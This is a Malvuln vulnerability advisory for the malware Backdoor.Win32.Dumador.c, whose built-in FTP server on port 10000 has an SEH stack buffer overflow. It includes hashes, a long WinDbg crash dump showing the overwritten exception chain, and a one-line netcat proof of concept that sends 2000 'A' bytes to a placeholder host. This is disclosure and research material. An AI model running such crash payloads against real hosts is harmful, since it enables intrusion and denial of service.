Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/6cc630843cabf23621375830df474bc5.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Dumador.c Vulnerability: Remote Stack Buffer Overflow (SEH) Description: The malware runs an FTP server on TCP port 10000. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH). Family: Dumador Type: PE32 MD5: 6cc630843cabf23621375830df474bc5 SHA256: 634eb7d9f5488b46ac44d784da8d82d98a8d86c1c8ef9a838535d44b8e420ea9 Vuln ID: MVID-2024-0679 ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 04/15/2024 Memory Dump: (16e0.150): Stack buffer overflow - code c0000409 (first/second chance not available) eax=00000000 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000000 edi=00000002 eip=775ced3c esp=0401f208 ebp=0401f248 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 775ced3c c21400 ret 14h 0:002> .ecxr eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194 eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 kernel32!lstrcpyA+0x1c: 74657c7c 880c16 mov byte ptr [esi+edx],cl ds:002b:04020000=?? *** WARNING: Unable to verify checksum for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe 0:002> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: kernel32!lstrcpyA+1c 74657c7c 880c16 mov byte ptr [esi+edx],cl EXCEPTION_RECORD: 0401f408 -- (.exr 0x401f408) ExceptionAddress: 74657c7c (kernel32!lstrcpyA+0x0000001c) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000008 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 04020000 Attempt to write to address 04020000 PROCESS_NAME: Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_PARAMETER1: 00000015 MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 CONTEXT: 0401f458 -- (.cxr 0x401f458) eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194 eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 kernel32!lstrcpyA+0x1c: 74657c7c 880c16 mov byte ptr [esi+edx],cl ds:002b:04020000=?? Resetting default scope WRITE_ADDRESS: 04020000 FOLLOWUP_IP: kernel32!lstrcpyA+1c 74657c7c 880c16 mov byte ptr [esi+edx],cl STACK_ADDR_RAW_STACK_SYMBOL: 401fa34 ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 00401bf3 to 74657c7c FAULTING_THREAD: ffffffff DEFAULT_BUCKET_ID: STACKIMMUNE PRIMARY_PROBLEM_CLASS: STACKIMMUNE BUGCHECK_STR: APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE STACK_TEXT: 00000000 00000000 unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe+0x0 STACK_COMMAND: .cxr 000000000401F458 ; kb ; ** Pseudo Context ** ; kb SYMBOL_NAME: unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe FOLLOWUP_NAME: MachineOwner MODULE_NAME: unknown IMAGE_NAME: unknown DEBUG_FLR_IMAGE_TIMESTAMP: 0 FAILURE_BUCKET_ID: STACKIMMUNE_c0000409_unknown!Unloaded BUCKET_ID: APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe Followup: MachineOwner --------- 0:002> !exchain 0401f2c0: ntdll!_except_handler4+0 (775d6a50) CRT scope 0, func: ntdll!RtlReportExceptionHelper+251 (776157ad) 0401f8d0: kernel32!_except_handler4+0 (7466d450) CRT scope 0, filter: kernel32!lstrcpyA+2d (74657c8d) func: kernel32!lstrcpyA+40 (74657ca0) 0401ffcc: 41414141 Invalid exception stack at 41414141 Exploit/PoC: python -c "print('A'*2000)" | nc64.exe x.x.x.x 10000 220 CONNECTED ERROR ERROR ERROR Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).